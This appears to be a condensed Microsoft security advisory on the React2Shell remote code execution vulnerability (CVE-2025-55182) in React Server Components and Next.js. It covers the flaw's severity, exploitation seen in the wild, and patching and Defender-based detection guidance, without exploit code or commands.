Key Takeaways:
- CVE-2025-55182 is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks.
- The vulnerability has a CVSS score of 10.0 and can be exploited through a single malicious HTTP request.
- Attackers can use this vulnerability to execute arbitrary code on vulnerable servers, leading to potential data breaches, lateral movement, and other malicious activities.
- Microsoft recommends patching affected systems, prioritizing internet-facing workloads, and using Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory and track remediation progress.
- Customers can use Microsoft Defender XDR, Microsoft Defender for Cloud, and Microsoft Security Copilot to detect and respond to threats related to this vulnerability.
Introduction to CVE-2025-55182
CVE-2025-55182, also referred to as React2Shell, is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks. With a CVSS score of 10.0, this vulnerability could allow attackers to execute arbitrary code on vulnerable servers through a single malicious HTTP request. The vulnerability exists because affected React Server Components versions fail to validate incoming payloads, allowing attackers to inject malicious structures that React accepts as valid, leading to prototype pollution and remote code execution.
Exploitation Activity
Exploitation activity related to this vulnerability was detected as early as December 5, 2025. Most successful exploits originated from red team assessments; however, real-world exploitation attempts by threat actors delivering multiple subsequent payloads, including coin miners, have also been observed. Both Windows and Linux environments have been impacted. The React Server Components ecosystem is a collection of packages, frameworks, and bundlers that enable React 19 applications to run parts of their logic on the server rather than the browser.
Vulnerability Factors
This vulnerability presents a significant risk due to several factors, including default configurations being vulnerable, public proof-of-concept exploits being readily available, exploitation happening without any user authentication, and the vulnerability being exploitable using a single malicious HTTP request. The vulnerability could be exploited using a single malicious HTTP request, making it a high-impact, low-friction attack path against modern React Server Components deployments.
Mitigation and Protection Guidance
Microsoft recommends customers to act on several mitigation recommendations, including manual identification guidance, patching immediately, prioritizing exposed services, monitoring for exploit activity, and adding WAF protections where appropriate. Customers can use Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory and track remediation progress across their estate. Microsoft Defender XDR customers can refer to the list of applicable detections to detect and respond to threats related to this vulnerability.
Microsoft Defender XDR Detections
Microsoft Defender XDR customers can use the following detections to detect potential React2Shell command injection attempts, encoded PowerShell attempts, and execution of suspicious commands initiated by the next-server parent process. These detections are integrated with automatic attack disruption, which can initiate autonomous containment actions to help stop the attack and prevent further progression.
Hunting Queries and Recommendations
Microsoft Defender XDR customers can use the following hunting queries to detect related activity in their networks, including potential React2Shell command injection attempts, encoded PowerShell attempts, and execution of suspicious commands initiated by the next-server parent process. Microsoft Defender for Cloud customers can use security explorer templates to locate exposed containers running vulnerable container images and vulnerable virtual machines.
Conclusion
CVE-2025-55182 represents a high-impact, low-friction attack path against modern React Server Components deployments. Rapid patching combined with layered Defender monitoring and WAF protections provides the strongest short-term and long-term risk reduction strategy. Microsoft recommends customers to prioritize patching affected systems, use Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory, and track remediation progress. By following these recommendations and using the provided detections and hunting queries, customers can detect and respond to threats related to this vulnerability and reduce the risk of exploitation.